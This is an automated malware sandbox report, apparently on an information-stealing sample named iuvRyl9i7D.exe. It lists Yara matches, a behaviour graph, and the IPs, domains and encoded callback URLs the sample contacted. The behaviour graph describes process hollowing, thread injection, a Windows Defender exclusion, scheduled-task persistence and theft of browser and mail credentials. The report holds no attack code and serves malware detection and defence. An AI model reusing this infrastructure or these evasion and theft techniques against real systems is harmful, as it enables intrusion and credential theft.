Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 626605 Sample: iuvRyl9i7D Startdate: 14/05/2022 Architecture: WINDOWS Score: 100 48 www.zeavd.com 2->48 50 vip.myshopline.shop 2->50 66 Snort IDS alert for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 11 other signatures 2->72 11 iuvRyl9i7D.exe 7 2->11         started        signatures3 process4 file5 40 C:\Users\user\AppData\...\dDqpEdJEtzi.exe, PE32 11->40 dropped 42 C:\Users\...\dDqpEdJEtzi.exe:Zone.Identifier, ASCII 11->42 dropped 44 C:\Users\user\AppData\Local\...\tmp280F.tmp, XML 11->44 dropped 46 C:\Users\user\AppData\...\iuvRyl9i7D.exe.log, ASCII 11->46 dropped 80 Uses schtasks.exe or at.exe to add and modify task schedules 11->80 82 Adds a directory exclusion to Windows Defender 11->82 84 Tries to detect virtualization through RDTSC time measurements 11->84 86 Injects a PE file into a foreign processes 11->86 15 iuvRyl9i7D.exe 11->15         started        18 powershell.exe 25 11->18         started        20 schtasks.exe 1 11->20         started        22 iuvRyl9i7D.exe 11->22         started        signatures6 process7 signatures8 88 Modifies the context of a thread in another process (thread injection) 15->88 90 Maps a DLL or memory area into another process 15->90 92 Sample uses process hollowing technique 15->92 94 Queues an APC in another process (thread injection) 15->94 24 explorer.exe 15->24 injected 28 conhost.exe 18->28         started        30 conhost.exe 20->30         started        process9 dnsIp10 52 properscooter.com 198.54.116.236, 49785, 49786, 49787 NAMECHEAP-NETUS United States 24->52 54 www.dems-clicks.com 5.183.8.183, 49768, 80 INTERXSCH Germany 24->54 56 7 other IPs or domains 24->56 76 System process connects to network (likely due to code injection or exploit) 24->76 78 Performs DNS queries to domains with low reputation 24->78 32 control.exe 12 24->32         started        signatures11 process12 signatures13 58 Tries to steal Mail credentials (via file / registry access) 32->58 60 Tries to harvest and steal browser information (history, passwords, etc) 32->60 62 Modifies the context of a thread in another process (thread injection) 32->62 64 2 other signatures 32->64 35 cmd.exe 2 32->35         started        process14 signatures15 74 Tries to harvest and steal browser information (history, passwords, etc) 35->74 38 conhost.exe 35->38         started        process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
38.34.163.59
 a6.pingcache.com United States
174 COGENT-174US true
35.209.127.155
 www.jamesreadtanusa.com United States
19527 GOOGLE-2US true
5.183.8.183
 www.dems-clicks.com Germany
64463 INTERXSCH true
35.241.47.216
 www.bldh45.xyz United States
15169 GOOGLEUS false
198.54.116.236
 properscooter.com United States
22612 NAMECHEAP-NETUS true
198.54.117.216
 parkingpage.namecheap.com United States
22612 NAMECHEAP-NETUS false

Contacted Domains

Name IP Active
a6.pingcache.com 38.34.163.59 true
www.bldh45.xyz 35.241.47.216 true
www.dems-clicks.com 5.183.8.183 true
www.jamesreadtanusa.com 35.209.127.155 true
parkingpage.namecheap.com 198.54.117.216 true
vip.myshopline.shop 104.17.232.29 true
properscooter.com 198.54.116.236 true
www.zeavd.com unknown unknown
www.properscooter.com unknown unknown
www.kickball.site unknown unknown
www.uspplongee.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.uspplongee.com/n6g4/ true
  • Avira URL Cloud: malware
 unknown
http://www.properscooter.com/n6g4/ true
  • Avira URL Cloud: malware
 unknown
http://www.bldh45.xyz/n6g4/ false
  • Avira URL Cloud: safe
 unknown
http://www.kickball.site/n6g4/ true
  • Avira URL Cloud: phishing
 unknown
http://www.kickball.site/n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu true
  • Avira URL Cloud: phishing
 unknown
http://www.jamesreadtanusa.com/n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi true
  • Avira URL Cloud: safe
 unknown
http://www.dems-clicks.com/n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV true
  • Avira URL Cloud: malware
 unknown